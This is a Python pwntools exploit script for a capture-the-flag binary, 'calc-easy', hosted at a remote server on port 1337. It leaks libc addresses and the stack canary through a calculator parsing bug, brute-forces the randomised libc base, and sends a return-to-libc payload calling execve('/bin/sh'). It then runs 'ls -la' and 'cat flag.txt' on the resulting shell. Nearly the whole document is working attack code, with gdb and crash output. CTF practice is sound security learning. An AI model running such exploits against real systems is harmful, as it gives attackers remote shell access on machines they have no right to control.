# exploit.py Piotr Szulc 347277
import struct
import pickle
import os
import time
from pwn import *
# Remote CTF target; both values are hard-coded and read by every connect()
# call further down in this script.
server = 'h4x.0x04.net'
port = 1337
'''
*** stack smashing detected ***: ./calc-easy terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c773)[0xb7650773]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)[0xb76e09b5]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xfc96a)[0xb76e096a]
./calc-easy(+0xb24)[0xb77c4b24]
./calc-easy(+0xa21)[0xb77c4a21]
./calc-easy(+0xa93)[0xb77c4a93]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb75fda63]
./calc-easy(+0x5c1)[0xb77c45c1]
======= Memory map: ========
'''
# I need to get offset of __libc_start_main (check above) and other offsets
def offsets():
    """Log the libc-2.19 offsets that are hard-coded as constants below.

    Parses the local ``libc-2.19.so`` with pwntools' ELF loader and logs
    the ``execve`` symbol offset, the offset of the first ``/bin/sh`` string,
    and every symbol whose name contains ``libc_start_main`` (the backtrace
    quoted above shows the crash inside that function).  Returns nothing;
    the printed values were copied by hand into the constants that follow.
    """
    libc = ELF('libc-2.19.so')
    execve_off = libc.symbols['execve']
    log.info('offset of execve: ' + hex(execve_off))  # observed: 0xb7330
    binsh_off = list(libc.search('/bin/sh'))[0]
    log.info('offset of binsh: ' + hex(binsh_off))  # observed: 0x15f551
    start_main_syms = [(name, addr) for name, addr in libc.symbols.items()
                       if 'libc_start_main' in name]
    for name, addr in start_main_syms:
        log.info('libc_start_main offset: ' + hex(addr))  # observed: 0x19970
# offsets()
# Offsets inside libc-2.19.so, as logged by offsets() above.  They are only
# valid for that exact libc build; any other libc on the target makes every
# address derived from them wrong.
libc_start_main_offset = 0x19970
# Distance of the leaked address from the start of __libc_start_main
# (the "+0xf3" visible in the backtrace quoted above).
additional_offset = 0xf3
execve_offset = 0xb7330
binsh_offset = 0x15f551
# Local pickle file written by sample_libc_addresses_from_server() and read
# back by get_libc_addresses().
libc_addresses_file = 'libc_addresses'
# Statistical approach - since the task is based on a 32-bit arch
# I thought only 4096 libc base addresses would be possible (after 5 tries and checking out the pattern).
# However, the function below showed that after 10000 tries I got only
# 256 different libc base addresses, all equally likely [rozklad.png].
# Brute force seems like the easiest idea - EX = 256 tries
# (idea from: http://www.pwntester.com/blog/2013/12/30/fusion-level02-write-up/)
def sample_libc_addresses_from_server():
    """Sample the remote binary's libc base 10000 times and pickle the result.

    Each iteration opens a fresh connection, sends 33 '(' followed by 32 ')',
    takes the last of the first 10 reply lines and slices the 10 characters
    before its trailing newline as a hex value.  Subtracting
    ``libc_start_main_offset + additional_offset`` from it gives a libc base
    (presumably the leaked value is a return address into
    __libc_start_main+0xf3, as the backtrace above suggests).  The bases are
    collected as hex strings and pickled to ``libc_addresses_file``.  Only
    the distribution is of interest here; the connection is closed at once.
    """
    libc_addresses = []
    for i in range(10000):
        p = connect(server,port)
        p.sendline(33*'('+ 32*')')
        # The [-11:-1] slice expects a 10-character value such as "0x........"
        # immediately before the newline; any other reply shape breaks int().
        reply = p.recvlines(10)[-1][-11:-1]
        libc_address = hex(int(reply, 16)- libc_start_main_offset - additional_offset)
        libc_addresses.append(libc_address)
        log.info(str(i) + ": " + str(libc_address))
        # NOTE: not in a finally block, so a failed recv leaves this
        # connection open.
        p.close()
    # Plain pickle of a list of str, only ever read back by get_libc_addresses().
    with open(libc_addresses_file, 'wb') as fp:
        pickle.dump(libc_addresses, fp)
#sample_libc_Addresses_from_server()
# Fallback libc base used when no sampled-addresses file exists.  It is the
# first base obtained by sample_libc_addresses_from_server(); the comments
# above report all observed bases as equally likely.
default_libc_base_address_guess = '0xb75ce000' # first address taken from sampling libc addresses from server above
def get_libc_addresses():
    """Return the distinct sampled libc bases, or the built-in default.

    When ``libc_addresses_file`` exists it is unpickled and deduplicated
    through a set (so the order of the returned list is arbitrary);
    otherwise a one-element list holding ``default_libc_base_address_guess``
    is returned.  The pickle is one this script wrote itself, but
    pickle.load executes whatever the file contains, so the file must not
    be taken from any other source.
    """
    if not os.path.isfile(libc_addresses_file):
        return [default_libc_base_address_guess]
    with open(libc_addresses_file, 'rb') as fp:
        sampled = pickle.load(fp)
    return list(set(sampled))
libc_addresses = get_libc_addresses()
# Only the first entry is used for the whole run.  get_libc_addresses()
# returns list(set(...)), so which sampled base lands first is arbitrary.
libc_addr = int(libc_addresses[0], 16)
# Absolute addresses derived from the guessed base and the fixed offsets above.
execve_addr = libc_addr+ execve_offset
binsh_addr = libc_addr + binsh_offset
log.info('Guessing addresses:')
log.info('libc address: ' + str(libc_addr) + ' [hex: ' + hex(libc_addr) + ']')
log.info('execve_addr: ' + str(execve_addr))
log.info('binsh_addr: ' + str(binsh_addr))
# Getting canary
# [32*token][32*value][canary]
# move SP to position 33 then using ')' we invoke:
# 'value[sp-1] = value[sp];'
def get_cannary():
    """Read back the stack canary over the module-level connection ``p``.

    Takes no parameters: it relies on ``p`` having been assigned by the
    caller (the main loop below).  Sends 32 '(' followed by 31 ')'; per the
    layout sketched in the comment above this is meant to move the
    calculator's value pointer so that the slot it prints is the canary.
    Returns the raw reply line, trailing newline included; the main loop
    parses it as a decimal integer and treats a negative value as a failed
    leak.
    """
    payload = 32*'(' + 31*')'
    p.sendline(payload)
    canary = p.recvline()
    log.info('Got canary: ' + canary)
    return canary
# after 1000 tries of different combinations of payload
'''
gdb-peda$ r
Starting program: /root/Pobrane/calc/calc-easy
(((((((((((((((((((((((((((((((()))))))))))))))))))))))))))))))
1348214784
(1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1348214784+1+2+3+4+5+6+7+9+10(
WTF?
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x80002000 --> 0x1ef4
ECX: 0x0
EDX: 0x5
ESI: 0x0
EDI: 0x1
EBP: 0xbffffbf8 --> 0x0
ESP: 0xbffffbf0 --> 0xbffffc10 --> 0x1
EIP: 0x2
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x2
'''
def get_payload(canary):
    """Build the calculator expression sent after a canary has been read.

    ``canary`` is the raw reply line from get_cannary(); its last character
    (the newline) is dropped.  The expression is '(' followed by 15 copies
    of '0+', the canary, '+0+', then the module-level ``execve_addr``, 0,
    ``binsh_addr``, 0, 0 each wrapped in parentheses, and a final '('.  The
    shape follows the gdb experiment quoted above.
    """
    frame_values = [execve_addr, 0, binsh_addr, 0, 0]
    parts = ['(', 15 * '0+', str(canary)[:-1], '+0+']
    parts.extend('(' + str(v) + ')' for v in frame_values)
    parts.append('(')
    return ''.join(parts)
trial = 0
start_time = time.time()
# Main brute force loop;
# Every pass opens a new connection (the sampling comment above reports a
# different libc base per connection), reads the canary and sends the payload
# built from the single libc guess chosen above.  Success is detected by
# 'flag.txt' appearing in the 'ls -la' output.  NOTE: the loop has no upper
# bound, and only the reads inside the try block are protected - an EOF on
# the earlier recvline calls aborts the whole script.
while True:
    p = connect(server, port)
    canary = get_cannary()
    # A negative "canary" is treated as a bad read: drop the connection and retry.
    if int(canary) < 0:
        p.close()
    else:
        trial += 1
        log.info('Trial #' + str(trial))
        p.sendline(get_payload(canary))
        p.recvline(1)
        p.sendline('ls -la')
        try:
            # Up to 20 lines with a 3 s timeout; a closed connection raises EOFError.
            response = ('\n').join(p.recvlines(20, timeout=3))
            print response
            if 'flag.txt' in response:
                p.sendline('cat flag.txt')
                print '**************************FLAG****************************************'
                print p.recvline()
                print("--- time taken %s seconds ---" % (time.time() - start_time))
                # Exits without closing p; the process teardown drops the socket.
                exit(0)
        except EOFError:
            pass
        p.close()